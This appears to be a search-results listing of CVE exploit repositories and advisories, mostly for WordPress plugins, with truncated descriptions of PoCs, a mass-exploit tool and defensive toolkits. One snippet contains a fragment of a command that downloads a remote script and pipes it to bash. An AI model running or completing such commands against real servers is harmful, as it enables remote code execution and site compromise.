295274 matches found
CVE-2026-57811
CVE-2026-57811 — Realtyna Organic IDX + WPL Real Estate Unauthenticated RCE -red.svg Critical Unauthenticated Remote Code Execution CVSS 10.0 — Realtyna Organic IDX + WPL Real Estate ≤ 5.2.0 This tool exploits CVE-2026-57811 , a critical vulnerability in the Realtyna Organic IDX + WPL Real Estate...
CVE-2024-6330
CVE-2024-6330 GEO my WordPress ivv900fnzbln0dem43z7zmzjjgigz...
jenkinsci__script-security-plugin_CVE-2023-24422_1228.vd93135a_2fb_25
Script Security Plugin User’s guide adapted from information on Template plugin in CloudBees Plugins guide Various Jenkins plugins require that users define custom scripts, most commonly in the Groovy language, to customize Jenkins’s behavior. If everyone who writes these scripts is a Jenkins...
CVE-2026-8181
EN: Controlled PoC and brief technical notes for authorized security testing of the authentication bypass in Burst Statistics. TR:...
litespeed-cpanel-cve-2026-54420-fix
CVE-2026-54420 Mitigation Toolkit Defensive remediation, auditing, and verification toolkit for CVE-2026-54420 affecting LiteSpeed cPanel Plugin in shared hosting environments using CloudLinux / CageFS. ⚠️ Security Notice This repository is intended for system administrators, hosting providers, an...
CVE-2026-59550
CVE-2026-59550 - AWP Classifieds ≤ 4.4.7 unauthenticated SQL injection Unauthenticated time-based blind SQL injection in the WordPress plugin AWP Classifieds another-wordpress-classifieds-plugin, reachable through the plugin's anonymous guest AJAX ad-submission flow. | ---|--- CVE| CVE-2026-59550...
CVE-2026-1405
CVE-2026-1405 Slider Future = 1.0.5 - Unauthenticated Arbitrary File Upload 🚀 CVE-2026-1405.py — Slider Future Mass Exploit Tool 🩸 Vulnerability Overview Component: Slider Future WordPress plugin Affected Versions: ≤ 1.0.5 Vulnerability: Unauthenticated Arbitrary File Upload CVE: CVE-2026-1405 CV...
CVE-2020-24913-exploit
qcubed-exploit You need Bun to be installed: https://bun.sh To install dependencies: bun install To run: show help bun run exploit -h test for vulnerability bun run exploit vulnerable -u https://site.com/framework/assets/core/php/profile.php create a session for a new target bun run exploit creat...
CVE-2026-81780-Hash-Form
CVE-2026-81780-Hash-Form CVE-2026-81780 — Hash Form RCE The Vulnerability Unauthenticated file upload in WordPress Hash Form plugin ≤ 1.4.2. The plugin allows arbitrary file uploads without proper authentication or file type validation, leading to Remote Code Execution RCE. Exploit Chain Step...
cve-2026-6471-postgres-logical-decoding-dlopen
PostgreSQL CVE-2026-6471: logical decoding dlopen of an arbitrary library PostgreSQL logical decoding lets a non-superuser role that holds the REPLICATION privilege create a logical replication slot and choose the output plugin. On affected versions there is no authorization check on that choice,...
CVE-2026-8732-PoC
CVE-2026-8732 — WP Maps Pro Unauthenticated Admin Creation English | Türkçe English Overview CVE-2026-8732 is a critical vulnerability CVSS 9.8 in the WP Maps Pro wp-google-map-gold WordPress plugin version = 6.1.0. Unauthenticated attackers can create WordPress administrator accounts by abusing...
CVE-2025-9216
StoreEngine – Powerful WordPress eCommerce Plugin for Payments, Memberships, Affiliates, Sales & More = 1.4.0 - Authenticated Subscriber+ Arbitrary File Upload The StoreEngine plugin contains a vulnerability in it's CSV Import/Export feature that allows any authenticated user subscriber, author,...
CVE-2023-1430
Update 2023-06-12: You no longer need the snippet. WPManageNinja patched the vulnerability two hours after public disclosure 93 days after reporting. Update 2024-01-27: The related issue with with everlasting hash values is now fully addressed. Responsible disclosure of unpatched vulnerability...
CVE-2022-4140
CVE-2022-4140 - WordPress plugin Welcart e-Commerce 2.8.5 - Arbitrary File Read This repo contains a Proof of ConceptPoC exploit for CVE-2022-4140. Disclaimer This project is provided for educational purposes and authorized security testing only. Do not use it against systems that you do not own ...
CVE-2023-6553
CVE-2023-6553 Exploit Development for CVE-2023-6553 on Backup Plugin in Wordpress This is a critical CVE with a CVSS score of 9.8 The vulnerability allows attacker to send commands to the server running the vulnerable version of the plugin Vulnerable Version Backup :9000/a.sh |bash';?" 3. You wil...
CVE-2026-116401 WordPress HUSKY plugin <= 1.4.6 - Broken Access Control vulnerability
Unauthenticated Broken Access Control in HUSKY = 1.4.6 versions...
CVE-2026-27061 WordPress User Registration plugin <= 5.3.0 - Cross Site Scripting (XSS) vulnerability
Subscriber Cross Site Scripting XSS in User Registration = 5.3.0 versions...
CVE-2019-15896
CVE-2019-15896 LifterLMS = 3.34.5 - Unauthenticated Options Import Description Unauthenticated Options Import, which could lead to Website Redirection Administrator Account Creation Content Injection Stored XSS The issues have been reported as fixed in 3.35.0. However v3.35.1 added additional inp...
CVE-2018-7747
CVE-2018-7747 CalderaForms 1.5.9.1 XSS WordPress plugin - tutorial CalderaForm is a WordPress plugin that makes it easy to create forms via drag and drop. During a recent engagement I happened to test some portals, one of which hosted a contact form created with this plugin. The custom...
CVE-2024-5326-Poc
CVE-2024-5326 CVE-2024-5326 Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX = 4.1.2 - Missing Authorization to Arbitrary Options Update Description The Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX plugin for WordPress is vulnerable to unauthorized modification of data...